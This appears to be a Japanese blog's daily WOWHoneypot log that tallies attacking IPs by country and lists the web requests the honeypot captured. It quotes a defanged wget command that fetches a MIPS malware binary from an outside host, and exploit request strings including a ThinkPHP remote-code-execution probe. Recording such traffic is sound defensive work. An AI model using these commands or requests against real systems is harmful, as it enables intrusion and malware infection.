23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(240日目)

2019/11/11(月)

トータルは203件でした。

ハンティングログは以下です。

65.32.180[.]57 wget+hxxp[:]//185.172.110[.]220/mipsel

www.virustotal.com
www.virustotal.com

IPのロケーション別の件数は以下です。

アメリ 71
中国 27
オランダ 24
トルコ 13
フランス 12
ドイツ 10
ブラジル 7
コロンビア 4
シンガポール 4
ベトナム 4
日本 4
ロシア 4
ウクライナ 3
タイ 3
エストニア 3
イラン 2
エクアドル 2
イタリア 1
ギリシャ 1
ラトビア 1
ケニア 1
ハンガリー 1
チェコ 1

f:id:sec23:20191124171252p:plain

件数 概要 リクエス
59 WordPressのログインページに対するブルートフォース攻撃 GET /wp-login.php
57 WordPressのログインページに対するブルートフォース攻撃 POST /wp-login.php
45 アクセス GET /
15 WordPress の Pingback を狙ったブルートフォース攻撃 POST /xmlrpc.php
3 クローリング HEAD /robots.txt
3 調査 GET /script
3 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
3 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
3 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
2 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
1 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
1 Linksys ルータの E シリーズの脆弱性を狙った通信 POST /tmUnblock.cgi
1 DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 POST /editBlackAndWhiteList
1 不正中継の調査 HEAD hxxp[:]//123.125.114.144/
1 不正中継の調査 GET hxxp[:]//www.123cha.com/
1 Yealinkの調査? GET /servlet?m=mod_listener&p=login&q=loginForm&jumpto=status
1 JBoss脆弱性を狙った通信 GET /invoker/JMXInvokerServlet
1 不正中継の試み CONNECT www.ip.cn:443
1 不正中継の試み CONNECT www.baidu.com:443
1 不正中継の試み CONNECT cn.bing.com:443